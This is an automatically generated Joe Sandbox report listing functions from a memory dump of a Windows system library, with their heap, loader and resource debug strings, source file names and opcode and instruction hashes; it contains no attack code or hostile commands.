                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                          • API String ID: 0-2224505338
                                                                          • Opcode ID: 313d9fd4eb2a7319509f538dc1c317e7afb7fbb0716f93e4afede8ec2698e203
                                                                          • Instruction ID: 0ad28b12c0df2051633efcd44028277447a266f9b076b80b7acca02b4d21a665
                                                                          • Opcode Fuzzy Hash: 313d9fd4eb2a7319509f538dc1c317e7afb7fbb0716f93e4afede8ec2698e203
                                                                          • Instruction Fuzzy Hash: 72511E36212284EFDB11CFA5C895F5AB3F9EB097B0F1588A9F4029F221CA71D941CF14
                                                                          Function 356DF113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-523794902
                                                                          • Opcode ID: 5fab144bf527cc462a8e4c1be4522590fa8ea5868253771445770c55fee9faed
                                                                          • Instruction ID: 91504087a887df4cfbb77fde00777d64ad8c38160b64b00be0b2abe51a043d29
                                                                          • Opcode Fuzzy Hash: 5fab144bf527cc462a8e4c1be4522590fa8ea5868253771445770c55fee9faed
                                                                          • Instruction Fuzzy Hash: EE420D756193819FD305CF28C894A2AFBFAFF88394F05496DE8858B352DB70D845CB92
                                                                          Function 3570510F Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.p5
                                                                          • API String ID: 0-4288392243
                                                                          • Opcode ID: 467506d4e4d9b8848eb7e0eaf40c7cdb8cf7e3bbd0da19f9222f0e4ad168409a
                                                                          • Instruction ID: 1e16046e5768713df5d26162f2a549357731990f0a5b7caff322b20d54f8cdd9
                                                                          • Opcode Fuzzy Hash: 467506d4e4d9b8848eb7e0eaf40c7cdb8cf7e3bbd0da19f9222f0e4ad168409a
                                                                          • Instruction Fuzzy Hash: 18F12AB6E04219EFDB11CF99C994EDEBBF9BF48690F51405AE505AB210E7B09E01CF90
                                                                          Function 356FB0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                          • API String ID: 0-122214566
                                                                          • Opcode ID: e24f86630415962f4e7aeef01cf7e0d9fc160b9b5e1e1656ca2aa1db4c6588e1
                                                                          • Instruction ID: 7e919973fd76cb35e2d50c0396b0066698f12e635bb634625bf55f15aeddef22
                                                                          • Opcode Fuzzy Hash: e24f86630415962f4e7aeef01cf7e0d9fc160b9b5e1e1656ca2aa1db4c6588e1
                                                                          • Instruction Fuzzy Hash: 9FC115B5F08319ABEB15CB64C890BBE77B2BF45350F54416DE802AF2A0DBB6D944C391
                                                                          Function 35709723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                          • API String ID: 3446177414-2283098728
                                                                          • Opcode ID: 25f0102bb2295b9ba8bc7d6cd50c36aab4cb07e9155b16a6ef409ec196276413
                                                                          • Instruction ID: 9a46a0c64211865438a28674aae02cf18c5c5079b75bb3bb82a79a01751a6292
                                                                          • Opcode Fuzzy Hash: 25f0102bb2295b9ba8bc7d6cd50c36aab4cb07e9155b16a6ef409ec196276413
                                                                          • Instruction Fuzzy Hash: 8251C076B043019FE710EF38C884A2AB7F2BB84324F15066DE4929F691DB71A845CF91
                                                                          Function 356D7662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                          • API String ID: 0-3061284088
                                                                          • Opcode ID: cac2ff36543496a3220d5ffc852b2533d30824331f70030548a441e108fb4634
                                                                          • Instruction ID: 40b0906fc52c0c2716f2d90ae744143748c8ce2cf4b2fe7d8692ce7217f130e5
                                                                          • Opcode Fuzzy Hash: cac2ff36543496a3220d5ffc852b2533d30824331f70030548a441e108fb4634
                                                                          • Instruction Fuzzy Hash: 2001703712A2D0AED715C329E40BF86F7F8EB42770F19489EE4044FAA5DEE59840DA94
                                                                          Function 356EBDE0 Relevance: 5.7, Strings: 4, Instructions: 694COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$.mui$.mun$SystemResources\
                                                                          • API String ID: 0-3047833772
                                                                          • Opcode ID: da19ae6af59379d156702dd614f0b14f13999208a47c6c2ddaca0766c41a06ee
                                                                          • Instruction ID: 6a5f5e485fbc7646edd31d04392b724888d8e7accd85d35b08db0b7801fd0172
                                                                          • Opcode Fuzzy Hash: da19ae6af59379d156702dd614f0b14f13999208a47c6c2ddaca0766c41a06ee
                                                                          • Instruction Fuzzy Hash: 02625B72B023298FEB21CF54CD44BD9B7B9BB0A350F4441EAE409A7A50DB719E85CF52
                                                                          Function 356F3C60 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                          • API String ID: 0-3178619729
                                                                          • Opcode ID: 9f18045a4edc127cde1b7b0a372d8ddd99c304c9d27dd724efc0b6c9162e2f59
                                                                          • Instruction ID: e007bd944bcdf08dbc4e9184a751c20ebc52ad42d912d4404db5144a49f122a5
                                                                          • Opcode Fuzzy Hash: 9f18045a4edc127cde1b7b0a372d8ddd99c304c9d27dd724efc0b6c9162e2f59
                                                                          • Instruction Fuzzy Hash: C5E2D074E08255CFEB14CF68C890BA9BBF1FF48305F148199E849ABB85D776A841CF91
                                                                          Function 356EB5E0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LUk5$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                          • API String ID: 0-985150174
                                                                          • Opcode ID: c1fd4a9114506a4ae686c873596a191b4613602348c2529a2d0b7edae371b114
                                                                          • Instruction ID: 23f91da9649d8787f5cbfad6c89fd1dea4a994ee18925c8b592f1f14e45cf2f2
                                                                          • Opcode Fuzzy Hash: c1fd4a9114506a4ae686c873596a191b4613602348c2529a2d0b7edae371b114
                                                                          • Instruction Fuzzy Hash: 41B1ACB5A067068BDB15CF64CA90B9DB3B6BF45744F60442DE866EB7A0D770D980CF01
                                                                          Function 3577327E Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}l5
                                                                          • API String ID: 0-935925950
                                                                          • Opcode ID: 074bbf93b411f65ef156f1396887afd09f3c6d984e8924b35befe6be7a4c7353
                                                                          • Instruction ID: f64bad21fb635c8214330e8533dd2b91c658a57fe5c6c4d5a7241faafbdf0a9c
                                                                          • Opcode Fuzzy Hash: 074bbf93b411f65ef156f1396887afd09f3c6d984e8924b35befe6be7a4c7353
                                                                          • Instruction Fuzzy Hash: 0E819DB5608340AFEB21CB29D844B7AB7E9FF84754F40092DF9859F290DB75D900CB62
                                                                          Function 356EB360 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LUk5$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                          • API String ID: 0-1793154059
                                                                          • Opcode ID: dddf001de8ee67a1ff9b2cfe957fa8b6daadc744a0a78c9f1a39ff01ec840353
                                                                          • Instruction ID: be2a35b9308c6b45c2888c0d82f1730277ee7b9561acf0b6c3ed5ce670775453
                                                                          • Opcode Fuzzy Hash: dddf001de8ee67a1ff9b2cfe957fa8b6daadc744a0a78c9f1a39ff01ec840353
                                                                          • Instruction Fuzzy Hash: BA91DFB5A0B349CBEB11CF54C640BADB3B1FF00364F644199E815AF2A0D7789A81CF91
                                                                          Function 356DF5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                          • API String ID: 0-2586055223
                                                                          • Opcode ID: f47c7c4fa0e7e5b5289c4c53ac9265c0fada7fd60e83efa9e2966e37caa5871e
                                                                          • Instruction ID: a00c742c72af8e0a1ecf3887c7cd515d62364c82f432c53fafc55f60954cac99
                                                                          • Opcode Fuzzy Hash: f47c7c4fa0e7e5b5289c4c53ac9265c0fada7fd60e83efa9e2966e37caa5871e
                                                                          • Instruction Fuzzy Hash: E1610176215780AFE311CB64C855F57F7EAFB807A0F050859F9548F692DB74E840CBA2
                                                                          Function 35773CD4 Relevance: 5.1, Strings: 4, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit$l/t5
                                                                          • API String ID: 0-198358361
                                                                          • Opcode ID: 65ea977f467797e228bac1f544041df53331b06e001a37b505f596eb52f6b730
                                                                          • Instruction ID: 4884fe1de447535825a4a4dd6b4a9a149fbe4cbd56a3a068029e387803914321
                                                                          • Opcode Fuzzy Hash: 65ea977f467797e228bac1f544041df53331b06e001a37b505f596eb52f6b730
                                                                          • Instruction Fuzzy Hash: 8441C472A05764CBEF12CB94E854BADB7B9FF45744F20009AD811EF391DBB59A01CB11
                                                                          Function 356D90F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                          • API String ID: 0-1391187441
                                                                          • Opcode ID: 915c6b8dca4a3a6faa484195890c385b53cf80d9ae531fd93981f90378636b23
                                                                          • Instruction ID: 41c4d4b755b7f965d83b52fd0aaf520c4c18d5b206e055cecd16614ef8b0fe44
                                                                          • Opcode Fuzzy Hash: 915c6b8dca4a3a6faa484195890c385b53cf80d9ae531fd93981f90378636b23
                                                                          • Instruction Fuzzy Hash: 8D31D236A01208EFDB11CB55CC89FDAB7F9FB457B0F1544A5E819AB291D770E940CEA0
                                                                          Function 35721190 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$eq5
                                                                          • API String ID: 0-2187334716
                                                                          • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                          • Instruction ID: 9df73b03138a0b8c91321d071ad82c17974f4a47d47773cee8dcd985bb381cad
                                                                          • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                          • Instruction Fuzzy Hash: A8316171A00659BFDB11CB95CC44EAEBBB9FB84750F004025F915AB260DB31DA05DBA0
                                                                          Function 3576166E Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                          • API String ID: 0-1880532218
                                                                          • Opcode ID: 928f8668d238f82b0c975bc637d9f586b505dee0a417d58e95142733f6ade14c
                                                                          • Instruction ID: 4a8fffb2914a151d3f8ca74066db3b73ebb71411208f872f5e6c7d4cf52178f4
                                                                          • Opcode Fuzzy Hash: 928f8668d238f82b0c975bc637d9f586b505dee0a417d58e95142733f6ade14c
                                                                          • Instruction Fuzzy Hash: 0A21217AE01280AFD701CB58D955A9AB3F6FF45748F0941A9EC85AB341EB34D906C741
                                                                          Function 356E7072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 5d4e5470838487219e80abcc609b7c2a1a2f8fed4794a4c915e0a1490a361b8b
                                                                          • Instruction ID: 499153d1e686b3d3d0d9729feaa60373881d4bae6dd4bd5c23587194f7baf8c8
                                                                          • Opcode Fuzzy Hash: 5d4e5470838487219e80abcc609b7c2a1a2f8fed4794a4c915e0a1490a361b8b
                                                                          • Instruction Fuzzy Hash: 935124B4A02785EFEB06EF65C944BADF7B2FF44365F10412AE4129B290DBB4D911CB81
                                                                          Function 35773608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                          • API String ID: 0-1168191160
                                                                          • Opcode ID: 8e4cf9530d27e5c2bd2a486ee743937ad709ad2ff60c56eb9f9c5614944de7f8
                                                                          • Instruction ID: 7b145289a46587496a7508b5daab8e70e837ccabd7905c5ea48f42e0b50028ac
                                                                          • Opcode Fuzzy Hash: 8e4cf9530d27e5c2bd2a486ee743937ad709ad2ff60c56eb9f9c5614944de7f8
                                                                          • Instruction Fuzzy Hash: 76F191B5A042288BDF21CF14DC84BE9B3B6FF44744F5440E9D609AB241EB719E85CF99
                                                                          Function 356E1380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • HEAP: , xrefs: 356E14B6
                                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 356E1648
                                                                          • HEAP[%wZ]: , xrefs: 356E1632
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                          • API String ID: 0-3178619729
                                                                          • Opcode ID: 4c1d456898f8179550cca3b74a86d62c8072cbad07a3107803dd494a0e01cac3
                                                                          • Instruction ID: 0c9b53f15d69700fd69b76b87b80d3fb70f5adbd23eb732dbb6a0e936142036e
                                                                          • Opcode Fuzzy Hash: 4c1d456898f8179550cca3b74a86d62c8072cbad07a3107803dd494a0e01cac3
                                                                          • Instruction Fuzzy Hash: 71E11F74A063819BEB14CF28C581BBAFBF2BF48350F14895DE4968B246E774E941DB50
                                                                          Function 3570F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 35750128
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 357500C7
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 357500F1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                          • API String ID: 0-2474120054
                                                                          • Opcode ID: f7612a3272d92246b75bb21e39d2c916365d5a2479bc7794f2b49dedf864c033
                                                                          • Instruction ID: 9d196562c801948cacf9a65b864b18062d294b7539b0df591305797c80cb260b
                                                                          • Opcode Fuzzy Hash: f7612a3272d92246b75bb21e39d2c916365d5a2479bc7794f2b49dedf864c033
                                                                          • Instruction Fuzzy Hash: D6E1ACB46087419FE711CF28C884B1AB7E2BF84364F100A5DF5A58F2E1DBB4E946CB52
                                                                          Function 3576330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                          • API String ID: 0-2391371766
                                                                          • Opcode ID: fb09b8a8c7562fa20c92f5fe95c9974d094ebc77a453c48371b169c8fd4acc87
                                                                          • Instruction ID: f3ae03fcad88127b93f75e8c9219e2ec9a1e237f0819c9e0d5c0e7f3f45995ff
                                                                          • Opcode Fuzzy Hash: fb09b8a8c7562fa20c92f5fe95c9974d094ebc77a453c48371b169c8fd4acc87
                                                                          • Instruction Fuzzy Hash: E4B18CB1A18345AFE312DF54C884F6BB7F9BB44758F400929FA519F290DB71E848CB92
                                                                          Function 357836E0 Relevance: 4.0, Strings: 3, Instructions: 280COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                                                          • API String ID: 0-1146358195
                                                                          • Opcode ID: 645ef3a2f842fd4d05ff2527040d1e33d48132992fb551879bc84448f6460c51
                                                                          • Instruction ID: a56b3772b91b2275150dbbe77a143d86611d65aa742bd380f817184266e0bc35
                                                                          • Opcode Fuzzy Hash: 645ef3a2f842fd4d05ff2527040d1e33d48132992fb551879bc84448f6460c51
                                                                          • Instruction Fuzzy Hash: 71A16A71A083459FD711DF28C885B1BBBE9BF84798F41092DB998AB250DB71DD08CB92
                                                                          Function 35767090 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                          • API String ID: 0-3870751728
